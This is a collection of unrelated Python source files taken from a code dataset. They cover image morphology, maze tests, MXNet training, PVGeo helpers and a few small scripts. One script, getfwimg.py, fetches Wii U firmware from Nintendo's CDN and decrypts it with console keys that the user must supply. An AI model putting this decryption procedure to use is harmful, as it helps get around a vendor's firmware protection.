'__main__':\n pass\n","sub_path":"exchangeConnection/jubi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480534773","text":"#!/usr/bin/python\n\n# insert keys here, your keys were set correctly if the crc32 of the fw.img\n# is d674201b and 
the crc32 of the fw.img.full.bin is 9f2c91ff in the end\nwiiu_common_key = \"you have to insert this yourself\"\nstarbuck_ancast_key = \"you have to insert this yourself\"\nstarbuck_ancast_iv = \"you have to insert this yourself\"\n\n# Don't edit past here\n\nimport os, sys, zlib\nimport codecs\nfrom Crypto.Cipher import AES\n\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib2 import urlopen\n\nprint(\"somewhat simple 5.5.1 fw.img downloader\")\n\n#prepare keys\nwiiu_common_key = codecs.decode(wiiu_common_key, 'hex')\nstarbuck_ancast_key = codecs.decode(starbuck_ancast_key, 'hex')\nstarbuck_ancast_iv = codecs.decode(starbuck_ancast_iv, 'hex')\n\nif zlib.crc32(wiiu_common_key) & 0xffffffff != 0x7a2160de:\n print(\"wiiu_common_key is wrong\")\n sys.exit(1)\n\nif zlib.crc32(starbuck_ancast_key) & 0xffffffff != 0xe6e36a34:\n print(\"starbuck_ancast_key is wrong\")\n sys.exit(1)\n\nif zlib.crc32(starbuck_ancast_iv) & 0xffffffff != 0xb3f79023:\n print(\"starbuck_ancast_iv is wrong\")\n sys.exit(1)\n\n\nprint(\"downloading osv10 cetk\")\n\n#download osv10 cetk\nf = urlopen(\"http://ccs.cdn.wup.shop.nintendo.net/ccs/download/000500101000400A/cetk\")\nd = f.read()\nif not d:\n print(\"cetk download failed!\")\n sys.exit(2)\n\n#get cetk encrypted key\nenc_key = d[0x1BF:0x1BF + 0x10]\n\n#decrypt cetk key using wiiu common key\niv = codecs.decode(\"000500101000400A0000000000000000\", 'hex')\ncipher = AES.new(wiiu_common_key, AES.MODE_CBC,iv)\ndec_key = cipher.decrypt(enc_key)\n\nprint(\"downloading fw.img\")\n#download encrypted 5.5.1 fw img\n\nf = urlopen(\"http://ccs.cdn.wup.shop.nintendo.net/ccs/download/000500101000400A/0000136e\")\nif not f:\n print(\"0000136e download failed!\")\n sys.exit(2)\n\nprint(\"decrypt first\")\n#decrypt fw img with our decrypted key\nbuffer = \"\"\n\nwith open(\"fw.img\",\"wb\") as fout:\n iv = codecs.decode(\"00090000000000000000000000000000\", \"hex\")\n cipher = AES.new(dec_key, AES.MODE_CBC, iv)\n\n while True:\n dec = f.read(0x4000)\n if len(dec) < 0x10:\n break\n enc = cipher.decrypt(dec)\n fout.write(enc)\n\nwith open('fw.img', 'rb') as f:\n if (zlib.crc32(f.read()) & 0xffffffff) != 0xd674201b:\n print(\"fw.img is corrupt, try again\")\n sys.exit(2)\n\nprint(\"decrypt second\")\n#decrypt ancast image with ancast key and iv\nwith open(\"fw.img\", \"rb\") as f:\n with open(\"fw.img.full.bin\",\"wb\") as fout:\n fout.write(f.read(0x200))\n cipher = AES.new(starbuck_ancast_key, AES.MODE_CBC, starbuck_ancast_iv)\n while True:\n dec = f.read(0x4000)\n if len(dec) < 0x10:\n break\n enc = cipher.decrypt(dec)\n fout.write(enc)\n\nwith open('fw.img.full.bin', 'rb') as f:\n if (zlib.crc32(f.read()) & 0xffffffff) != 0x9f2c91ff:\n print(\"fw.img.full.bin is corrupt, try again with better keys\")\n sys.exit(2)\n\nprint(\"done!\")\n","sub_path":"bin/getfwimg.py","file_name":"getfwimg.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559885513","text":"import unittest\nimport sys\nimport os\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '../Class'))\nfrom Class.Carte import Carte\n\nclass CarteTest(unittest.TestCase):\n\n\t\"\"\"\n\tTest la class Carte de Carte.py\n\t\"\"\"\n\tdef setUp(self):\n\t\t\"\"\"setup le test set\"\"\"\n\t\tself.test = {\n\t\t\t\"zeroNl\" : \"OOOOOO\",\n\t\t\t\"sixNl\" : \"\\n\\n\\n\\n\\n\",\n\t\t\t\"fullmap\" :\n\t\t\t\t\"OOOOOOOO\\n\"\n\t\t\t\t\"O UO\\n\"\n\t\t\t\t\"OOOOOOOO\",\n\t\t\t\"fullmapDoor\" 
:\n\t\t\t\t\"OOOOOOOO\\n\"\n\t\t\t\t\"O .   UO\\n\"\n\t\t\t\t\"OOOOOOOO\"\n\t\t}\n\n\t\tself.maze = {}\n\t\tfor key, val in self.test.items():\n\t\t\tself.maze[key] = Carte(key, val)\n\n\tdef testConvStrDic(self):\n\t\t\"\"\"\n\t\tCheck that the conversion from the string to a dict is done correctly\n\t\t\"\"\"\n\t\tzeroNl = {\n\t\t\t(1, 1) : \"O\",\n\t\t\t(1, 2) : \"O\",\n\t\t\t(1, 3) : \"O\",\n\t\t\t(1, 4) : \"O\",\n\t\t\t(1, 5) : \"O\",\n\t\t\t(1, 6) : \"O\"\n\t\t}\n\t\tsixNl = {\n\t\t\t(1, 1) : \"\\n\",\n\t\t\t(2, 1) : \"\\n\",\n\t\t\t(3, 1) : \"\\n\",\n\t\t\t(4, 1) : \"\\n\",\n\t\t\t(5, 1) : \"\\n\"\n\t\t}\n\t\tfullmap = {\n\t\t\t(1, 1) : \"O\", (2, 1) : \"O\", (3, 1) : \"O\",\n\t\t\t(1, 2) : \"O\", (2, 2) : \" \", (3, 2) : \"O\",\n\t\t\t(1, 3) : \"O\", (2, 3) : \" \", (3, 3) : \"O\",\n\t\t\t(1, 4) : \"O\", (2, 4) : \" \", (3, 4) : \"O\",\n\t\t\t(1, 5) : \"O\", (2, 5) : \" \", (3, 5) : \"O\",\n\t\t\t(1, 6) : \"O\", (2, 6) : \" \", (3, 6) : \"O\",\n\t\t\t(1, 7) : \"O\", (2, 7) : \"U\", (3, 7) : \"O\",\n\t\t\t(1, 8) : \"O\", (2, 8) : \"O\", (3, 8) : \"O\",\n\t\t\t(1, 9) : \"\\n\", (2, 9) : \"\\n\"\n\t\t}\n\t\tself.assertEqual(self.maze[\"zeroNl\"].labyrinthe, zeroNl)\n\t\tself.assertEqual(self.maze[\"sixNl\"].labyrinthe, sixNl)\n\t\tself.assertEqual(self.maze[\"fullmap\"].labyrinthe, fullmap)\n\n\tdef testPickRandomLocation(self):\n\t\t\"\"\"\n\t\tTests the method that returns a free coordinate\n\t\t\"\"\"\n\t\tcoordZero = self.maze[\"zeroNl\"].pickRandomLocation()\n\t\tcoordfive = self.maze[\"sixNl\"].pickRandomLocation()\n\t\tcoordfull = self.maze[\"fullmap\"].pickRandomLocation()\n\n\t\t# since the first 2 maps have no free cell,\n\t\t# the returned coordinates must be None\n\t\tself.assertIsNone(coordZero)\n\t\tself.assertIsNone(coordfive)\n\t\t# check that the coordinates are registered in the dictionary\n\t\tself.assertIn(coordfull, self.maze[\"fullmap\"].labyrinthe)\n\t\t# then that the value stored at that key is an empty space\n\t\tself.assertEqual(self.maze[\"fullmap\"].labyrinthe[coordfull], \" \")\n\n\tdef test__str__(self):\n\t\t\"\"\"\n\t\tTests the __str__ method\n\t\t\"\"\"\n\t\tfor key, val in self.test.items():\n\t\t\tso = \"test : \" + val\n\t\t\tsv = \"test : \" + self.maze[key].__str__()\n\t\t\tself.assertEqual(sv, so)\n\n\tdef test__repr__(self):\n\t\t\"\"\"\n\t\tTests the __repr__ method\n\t\t\"\"\"\n\t\tfor key, val in self.maze.items():\n\t\t\tso = \"\"\n\t\t\tself.assertEqual(so, val.__repr__())\n\n\tdef testRobotCanMove(self):\n\t\t\"\"\"\n\t\tChecks the robotCanMove method\n\t\t\"\"\"\n\t\tfullmap = self.maze[\"fullmap\"]\n\t\tcoord1 = (2, 1)\n\t\tcoord2 = (2, 2)\n\t\tcoord3 = (1, 4)\n\t\t# test every direction\n\t\t# coord1 and coord3 always fail\n\t\tfor l in \"nsew\":\n\t\t\tself.assertFalse(fullmap.actionOk(coord1, l, l, 1))\n\t\t\tself.assertFalse(fullmap.actionOk(coord3, l, l, 1))\n\n\t\t# from coord2 the robot can only move east,\n\t\t# over 6 cells including the starting one\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"n\", \"n\", 1))\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"s\", \"s\", 1))\n\t\tself.assertFalse(fullmap.actionOk(coord2, \"o\", \"o\", 1))\n\n\t\tself.assertTrue(fullmap.actionOk(coord2, \"e\", \"e\", 1))\n\t\tself.assertTrue(fullmap.actionOk(coord2, \"e\", \"e\", 5))\n\n\tdef testRobotCanWork(self):\n\t\t\"\"\"\n\t\tChecks the robotCanWork method\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\tcoord = (2, 2)\n\t\t# test the wall-building (\"m\") action\n\t\t# north, south and 
west are walls on the map\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"n\"))\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"s\"))\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"m\", \"o\"))\n\t\t# the door is east of the robot\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"m\", \"e\"))\n\n\t\t# north, south and west are walls on the map\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"n\"))\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"s\"))\n\t\tself.assertTrue(fullmapDoor.actionOk(coord, \"p\", \"o\"))\n\t\t# the door is east of the robot\n\t\tself.assertFalse(fullmapDoor.actionOk(coord, \"p\", \"e\"))\n\n\tdef testBuildWall(self):\n\t\t\"\"\"\n\t\tChecks the buildWall method\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\t# pick a coordinate containing a door\n\t\tcoord = (2, 3)\n\t\tres = \"OOOOOOOO\\nO O   UO\\nOOOOOOOO\"\n\n\t\t# the function returns True when it has placed a wall\n\t\tself.assertTrue(fullmapDoor.buildWall(coord))\n\t\t# if the wall was placed, the map must have changed\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n\t\t# otherwise it returns False when the cell is not a door\n\t\tself.assertFalse(fullmapDoor.buildWall(coord))\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n\tdef testBuildDoor(self):\n\t\t\"\"\"\n\t\tChecks the buildDoor method\n\t\t\"\"\"\n\t\tfullmapDoor = self.maze[\"fullmapDoor\"]\n\t\tres = \"O.OOOOOO\\n. .   UO\\nO.OOOOOO\"\n\t\tlst = [(1, 2), (2, 1), (3, 2)]\n\n\t\t# the function returns True when it has placed a door\n\t\tfor l in lst:\n\t\t\tself.assertTrue(fullmapDoor.buildDoor(l))\n\n\t\t# otherwise it returns False when the cell is not a wall\n\t\tself.assertFalse(fullmapDoor.buildDoor((2, 2)))\n\t\tself.assertFalse(fullmapDoor.buildDoor((2, 3)))\n\t\tself.assertEqual(fullmapDoor.__str__(), res)\n\n","sub_path":"activity/labyrinthe_2/test/test_carte.py","file_name":"test_carte.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"98983999","text":"from flask_restx import Resource\nfrom opentera.services.ServiceAccessManager import ServiceAccessManager, current_login_type, current_device_client, \\\n    current_participant_client, current_user_client, LoginType\nfrom services.BureauActif.FlaskModule import default_api_ns as api\n\n\nclass QueryAccountInfos(Resource):\n\n    def __init__(self, _api, *args, **kwargs):\n        Resource.__init__(self, _api, *args, **kwargs)\n        self.module = kwargs.get('flaskModule', None)\n\n    @api.doc(description='Gets current login type: device, participant or user and associated information',\n             responses={200: 'Success'})\n    @ServiceAccessManager.token_required\n    def get(self):\n        account_infos = {\n            'login_type': 'unknown',\n            'login_id': 0,\n            'is_super_admin': False,\n            'username': 'unknown'\n        }\n\n        if current_login_type == LoginType.DEVICE_LOGIN:\n            account_infos['login_type'] = 'device'\n            account_infos['login_id'] = current_device_client.id_device\n\n        if current_login_type == LoginType.PARTICIPANT_LOGIN:\n            participant = current_participant_client.get_participant_infos()\n            account_infos['login_type'] = 'participant'\n            account_infos['login_id'] = current_participant_client.id_participant\n            account_infos['username'] = participant['participant_username']\n\n        if current_login_type == LoginType.USER_LOGIN:\n            user = current_user_client.get_user_info()\n            account_infos['login_type'] = 'user'\n            
account_infos['login_id'] = current_user_client.id_user\n            account_infos['is_super_admin'] = current_user_client.user_superadmin\n            account_infos['username'] = user[0]['user_username']\n            account_infos.update({'sites': user[0]['sites']})\n\n        return account_infos\n\n","sub_path":"teraserver/python/services/BureauActif/API/QueryAccountInfos.py","file_name":"QueryAccountInfos.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"3171357","text":"#compute the area of a square\narea,lado=0,0\n\n#assign the values\nlado=18\n\n#compute\narea=lado*lado\n\n#print the values\nprint(\"the side is:\",lado)\nprint(\"the area is:\",area)\n","sub_path":"ejercicio10.py","file_name":"ejercicio10.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"316321867","text":"color_list = [\"red\", \"blue\", \"yellow\", \"teal\"]\nprint(\"* \" * 10)\nwhile True:\n    command = input(\"What's your command (add, remove, draw)?\")\n    if command == \"remove\":\n\n        print(\"old color:\")\n        color_to_remove = input(\"color_to_remove?\")\n        color_list.remove(color_to_remove)\n\n\n    elif command == \"add\":\n\n        color_to_append = input(\"color_to_append?\")\n        color_list.append(color_to_append)\n\n\n    elif command == \"draw\":\n\n        from turtle import*\n        shape(\"turtle\")\n        hideturtle()\n        penup()\n        for c in color_list:\n            fillcolor(c)\n            stamp()\n            forward(20)\n            left(30)\n        mainloop()\n\n\n    for c in color_list:\n        print(c)\n    print(\"* \" * 10)","sub_path":"list_remove.py","file_name":"list_remove.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"630968211","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n\tname = \"wind\",\n\tversion = \"0.0.1\",\n\tauthor = \"Trevor F. 
Smith\",\n\tauthor_email = \"subs@trevor.smith.name\",\n\tdescription = \"A WebSocket event system for Django.\",\n\tlicense = \"apache2.0\",\n\tkeywords = \"django websockets events python\",\n\turl = \"https://github.com/TrevorFSmith/wind\",\n\tpackages = find_packages(\n\t\texclude=[]\n\t),\n\tinclude_package_data = True,\n\tlong_description=read('README.md'),\n\tclassifiers=[\n\t\t\"Development Status :: 3 - Alpha\",\n\t\t\"Topic :: Utilities\",\n\t\t\"License :: OSI Approved :: Apache 2.0\",\n\t],\n\tscripts = [],\n\tinstall_requires=['django','south','django-piston', 'gevent-websocket'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"198708912","text":"# Morphological transformations are normally performed on binary images\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv.imread('images/smarties.png', cv.IMREAD_GRAYSCALE)\n_, mask = cv.threshold(img, 220, 255, cv.THRESH_BINARY_INV)\n# kernal = np.ones((2,2) , np.uint8)\nkernal = np.ones((3,3) , np.uint8)\nprint(kernal)\ndilation = cv.dilate(mask, kernal, iterations=2)\nerosion = cv.erode(mask, kernal, iterations=1)\nopening = cv.morphologyEx(mask, cv.MORPH_OPEN, kernal)\nclosing = cv.morphologyEx(mask, cv.MORPH_CLOSE, kernal)\n\n\ntitle = ['image', 'mask', 'dilation', 'erosion', 'opening', 'closing']\nimages = [img, mask, dilation, erosion, opening, closing]\n\nfor i in range(len(title)):\n    plt.subplot(2, 3, i+1), plt.imshow(images[i], 'gray')\n    plt.title(title[i])\n    plt.xticks([]), plt.yticks([])\n\nplt.show()","sub_path":"OpenCv/openCv Practical/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"415354473","text":"\"\"\"\nThese are helpers specifically for the file readers for private use only.\n@author: Bane Sullivan\n\"\"\"\n__all__ = [\n    'getVTKtype',\n    'converStringArray',\n    'ConvertArray',\n    'placeArrInTable',\n    'getdTypes',\n    'cleanDataNm',\n    'createModifiedCallback',\n]\n\nimport numpy as np\nfrom vtk.util import numpy_support as nps\nimport vtk\nimport os\nfrom . import errors as _helpers\nfrom .arrays import numToVTK\n\ndef getVTKtype(typ):\n    \"\"\"This looks up the VTK type for a given python data type.\n\n    Return:\n        int : the integer type id specified in vtkType.h\n    \"\"\"\n    typ = nps.get_vtk_array_type(typ)\n    if typ == 3:\n        return 13\n    return typ\n\ndef converStringArray(arr):\n    \"\"\"A helper to convert a numpy array of strings to a vtkStringArray\n\n    Return:\n        vtkStringArray : the converted array\n    \"\"\"\n    vtkarr = vtk.vtkStringArray()\n    for val in arr:\n        vtkarr.InsertNextValue(val)\n    return vtkarr\n\ndef ConvertArray(arr):\n    \"\"\"A helper to convert a numpy array to a vtkDataArray\n\n    Return:\n        vtkDataArray : the converted array\n\n    Note:\n        this converts the data array but does not set a name. 
The name must be set for this data array to be added to a vtkDataSet ``array.SetName('Data')``\n    \"\"\"\n    arr = np.ascontiguousarray(arr)\n    typ = getVTKtype(arr.dtype)\n    if typ == 13:\n        VTK_data = converStringArray(arr)\n    else:\n        VTK_data = numToVTK(arr, array_type=typ)\n    return VTK_data\n\n\ndef placeArrInTable(ndarr, titles, pdo):\n    \"\"\"Takes a 1D/2D numpy array and makes a vtkTable of it\n\n    Args:\n        ndarr (numpy.ndarray) : The 1D/2D array to be converted to a table\n        titles (list or tuple): The titles for the arrays in the table. Must have same number of elements as columns in input ndarray\n        pdo (vtkTable) : The output data object pointer\n\n    Return:\n        vtkTable : returns the same input pdo table\n    \"\"\"\n    # Put columns into table\n    if len(np.shape(ndarr)) > 2:\n        raise _helpers.PVGeoError('Input np.ndarray must be 1D or 2D to be converted to vtkTable.')\n    if len(np.shape(ndarr)) == 1:\n        # First check if it is an array full of tuples (varying type)\n        if isinstance(ndarr[0], (tuple, np.void)):\n            for i in range(len(titles)):\n                placeArrInTable(ndarr['f%d' % i], [titles[i]], pdo)\n            return pdo\n        # Otherwise it is just a 1D array which needs to be 2D\n        else:\n            ndarr = np.reshape(ndarr, (-1, 1))\n    cols = np.shape(ndarr)[1]\n\n    for i in range(cols):\n        VTK_data = ConvertArray(ndarr[:,i])\n        VTK_data.SetName(titles[i])\n        pdo.AddColumn(VTK_data)\n    return pdo\n\n\n\ndef getdTypes(dtype='', endian=None):\n    \"\"\"This converts char dtypes and an endian to a numpy and VTK data type.\n\n    Return:\n        tuple (numpy.dtype, int) : the numpy data type and the integer type id specified in vtkType.h for VTK data types\n    \"\"\"\n    # If native `@` was chosen then do not pass an endian\n    if endian == '@':\n        #print('WARNING: Native endianness no longer supported for packed binary reader. Please choose `>` or `<`. 
This defaults to big `>`.')\n        endian = ''\n    # No endian specified:\n    elif endian is None:\n        endian = ''\n    # Get numpy and VTK data types and return them both\n    if dtype == 'd':\n        vtktype = vtk.VTK_DOUBLE\n    elif dtype == 'f':\n        vtktype = vtk.VTK_FLOAT\n    elif dtype == 'i':\n        vtktype = vtk.VTK_INT\n    else:\n        raise _helpers.PVGeoError('dtype \\'%s\\' unknown:' % dtype)\n    # Return data types\n    dtype = np.dtype('%s%s' % (endian, dtype))\n    return dtype, vtktype\n\n\ndef cleanDataNm(dataNm, FileName):\n    \"\"\"A helper to clean a FileName to make a useful data array name\"\"\"\n    if dataNm is None or dataNm == '':\n        dataNm = os.path.splitext(os.path.basename(FileName))[0]\n    return dataNm\n\n\ndef createModifiedCallback(anobject):\n    import weakref\n    weakref_obj = weakref.ref(anobject)\n    anobject = None\n    def _markmodified(*args, **kwars):\n        o = weakref_obj()\n        if o is not None:\n            o.Modified()\n    return _markmodified\n","sub_path":"PVGeo/_helpers/readers.py","file_name":"readers.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"457282657","text":"f = open('./input/rosalind_lexf.txt', 'r')\ns=f.readline().strip().split(' ')\nn=int(f.readline())\n\ndef affiche(taille):\n    if taille>0:\n        tmp_list=affiche(taille-1)\n        res=[]\n        for i in s:\n            res.extend([i+elt for elt in tmp_list])\n        return res\n    else:\n        return ['']\n    \nfor i in affiche(n):\n    print(i)\n\n","sub_path":"Rosalind/AC/LEXF.py","file_name":"LEXF.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"240062829","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport mxnet as mx\nfrom mxnet import gluon, autograd, nd\nfrom mxnet import init\nimport utils\n\n\n########################################################################################################################\n##### MNIST\nfrom cnn.load_datasets import Preprocessing\n\npath = 'dataset/image/MonkeySpecies2'\nimage_resize = 96\nbatch_size = 32\n\na = Preprocessing()\na.setdata(path, image_resize, batch_size)\ntrain_iter, test_iter = a.MNIST()\n\n\n########################################################################################################################\nfrom cnn.image_preprocessing import Preprocessing\n\npath = 'dataset/image/MonkeySpecies2'\nimage_resize = 96\nbatch_size = 32\n\na = Preprocessing()\na.setdata(path, image_resize, batch_size)\ntrain_iter, test_iter = a.MNIST()\n\n################## model\nfrom mxnet.gluon.model_zoo import vision\nctx = mx.cpu()\nnet = vision.resnet18_v1(classes=10, pretrained=False)\n\n\n\n\n\n########################################################################################################################\nimport sys\nimport os\nimport json\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn\nfrom time import time\nfrom matplotlib import pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\nfrom gluoncv.data.transforms.presets.imagenet import transform_eval\n\ndef evaluate_accuracy(data_iterator, net, ctx):\n    acc = mx.metric.Accuracy()\n    for i, (data, label) in enumerate(data_iterator):\n        predictions = nd.argmax(net(data.as_in_context(ctx)), axis=1)\n        
acc.update(preds=predictions, labels=label.as_in_context(ctx))\n    return acc.get()[1]\n\n\n\n\nmx.random.seed(1)\nepochs = 1\nlr = 0.1\nnum_workers = 0\nsoftmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()\nmetric = mx.metric.Accuracy()\n\n# Initialize parameters randomly\nnet.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx, force_reinit=True)\ntrainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': lr})\n\ntrain_start = time()\nall_train_mse = []\nall_test_mse = []\ntest_label = []\ntrain_imgs = []\nscores_test = []\n\nfor e in range(epochs):\n    for i, (data, label) in enumerate(train_iter):\n        data = data.as_in_context(ctx)\n        label = label.as_in_context(ctx)\n        # Wait for completion of previous iteration to\n        # avoid unnecessary memory allocation\n        nd.waitall()\n        with autograd.record():\n            output = net(data)\n            loss = softmax_cross_entropy(output, label)\n        loss.backward()\n        trainer.step(data.shape[0])\n        metric.update([label], [output])\n        if i % 10 == 0 and i > 0:\n            name, acc = metric.get()\n            print('[Epoch %d Batch %d] Training: %s=%f' % (e, i, name, acc))\n            sys.stdout.flush()\n\n    train_mse = evaluate_accuracy(train_iter, net, ctx)\n    test_mse = evaluate_accuracy(test_iter, net, ctx)\n    all_train_mse.append(train_mse)\n    all_test_mse.append(test_mse)\n\n    name, acc = metric.get()\n    print('[Epoch %d] Training: %s=%f' % (e, name, acc))\n    sys.stdout.flush()\n\n# save trained weights\nnet.save_parameters(\"model_trained.params\")\n\neval_start = time()\nprint(\"{} workers: train duration {:.4}\".format(\n    num_workers, eval_start - train_start))\nsys.stdout.flush()\n\nplt.plot(all_train_mse)\nplt.plot(all_test_mse)\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.title('Accuracy')\nplt.legend(['train', 'valid'])\nplt.savefig('accuracy.jpg')\n\nfor i, (data, label) in enumerate(test_iter):\n\n    if i % 10 == 0 and i > 0:\n        name, acc = metric.get()\n        print('[Epoch %d Batch %d] Training: %s=%f' % (e, i, name, acc))\n    predictions = nd.argmax(net(data.as_in_context(ctx)), axis=1)\n    test_label.append(label)\n    scores_test.append(predictions)\n\ntest_label = nd.concat(*test_label, dim=0)\nscores_test = nd.concat(*scores_test, dim=0)\n# print(test_label)\n# print(\"----------------\")\n# print(scores_test)\nmax_label = np.max(test_label.asnumpy())\n\nmyClasses = list(range(0, int(max_label + 1), 1))\nlabel = label_binarize(test_label.asnumpy(), classes=myClasses)\npred = label_binarize(scores_test.asnumpy(), classes=myClasses)\nplt.clf()\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\nfor i in range(int(max_label + 1)):\n    fpr[i], tpr[i], _ = metrics.roc_curve(label[:, i], pred[:, i])\n    roc_auc[i] = metrics.auc(fpr[i], tpr[i])\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr[0], tpr[0], label='ROC curve (area = %0.2f)' % roc_auc[0])\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.savefig('roc_curve.jpg')\n\n# precision\nprecision = precision_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(),\n                            average='weighted') # , zero_division=0)\nprint('Precision: %f' % precision)\n# recall\nrecall = recall_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(), average='weighted')\nprint('Recall: %f' % recall)\n# f1_score\nf1 = f1_score(y_true=test_label.asnumpy(), y_pred=scores_test.asnumpy(), average='weighted')\nprint('F1 score: %f' % f1)","sub_path":"test/load_dataset_test_trainer.py","file_name":"load_dataset_test_trainer.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"112518861","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas\nfrom datetime import datetime\n\n\ndatafile = '/Users/ivanov/Yandex.Disk.localized/DESY_2018/Ti45Nb/Ti45Nb_1.log'\nsavefile = '/Users/ivanov/Yandex.Disk.localized/DESY_2018/Ti45Nb/dilatometer_data.txt'\n\ndata = pandas.read_csv(datafile, header = 8, sep = '\\s+')\ndata = pandas.DataFrame(data).values\n\ntime = data[:,0]\n\n\nfmt = '%H:%M:%S'\nsec = [0]\nsumm_seconds = [0]\nfor i in range(len(time)-1):\n d1 = datetime.strptime(time[i],fmt)\n d2 = datetime.strptime(time[i+1],fmt)\n diff=d2-d1\n total_seconds=diff.seconds\n sec.append(total_seconds)\n summ = np.sum(sec)\n summ_seconds.append((summ))\n\ntrue_time = summ_seconds\ntemperature = data[:,-2]\ndilatometer = data[:,-1]\n\ntrue_temperature = []\nfor temp in temperature:\n try:\n t = float(temp)\n true_temperature.append(t)\n except:\n true_temperature.append(25)\n\n\ntrue_dilatometer = []\nfor value in dilatometer:\n try:\n t = float(value)\n true_dilatometer.append(t)\n except:\n true_dilatometer.append(0)\n\n\ndatasave = np.array((np.row_stack((np.array(true_time), np.array(true_temperature), np.array(true_dilatometer)))).T)\n\nnp.savetxt(savefile, datasave, fmt = '%.i %.2f %.2f')\n\n","sub_path":"DESY_2018/import_dilatometer.py","file_name":"import_dilatometer.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458219910","text":"import json\nimport argparse\nfrom pathlib import Path\nimport yaml\n\n\nclass ConfigBuilder:\n def __init__(self, config, options):\n self.config = config\n self.options = options\n\n def set_option(self, option_name, category=None, alt_config_name=None):\n # if overwrite is disabled (False), check if set and, if so, skip\n if not self.overwrite:\n name = self._config_name(option_name, alt_config_name)\n if self.get_config(name, category) is not None:\n return\n\n # some options are optional, skip them if not set\n if self.options.get(option_name, None) is not None:\n\n if category:\n if self.config.get(category, None) is None:\n self.config[category] = dict()\n self.config[category][self._config_name(\n option_name, alt_config_name)] = self.options[option_name]\n else:\n self.config[self._config_name(\n option_name, alt_config_name)] = self.options[option_name]\n\n def get_config(self, config_name, category=None):\n # return a configuration variable.\n if category:\n try:\n return self.config.get(category).get(config_name, None)\n except AttributeError:\n return None\n else:\n return self.config.get(config_name, None)\n\n def get_device_config(self, device_id, setting):\n # return a device configuration variable, for testing purposes\n return self.config.get(\"devices\").get(device_id).get(setting, None)\n\n def dump(self, config_path):\n with open(config_path, 'w') as f:\n yaml.safe_dump(self.config, f, default_flow_style=False)\n\n def set_log_dir(self, data_path):\n if self.options.get(\"log_directory\", None):\n if self.config.get(\"advanced\", None) is None:\n self.config[\"advanced\"] = dict()\n log_dir = Path(data_path).joinpath(\n self.options.get(\"log_directory\"))\n self.config[\"advanced\"][\"log_directory\"] = log_dir\n\n def set_devices_config(self, devices):\n self.config[\"devices\"] = dict()\n for device in devices:\n self.config[\"devices\"][device[\"id\"]] = {\n k: v\n for k, v in device.items()\n }\n\n @property\n def overwrite(self):\n # overwrite is enabled by default. 
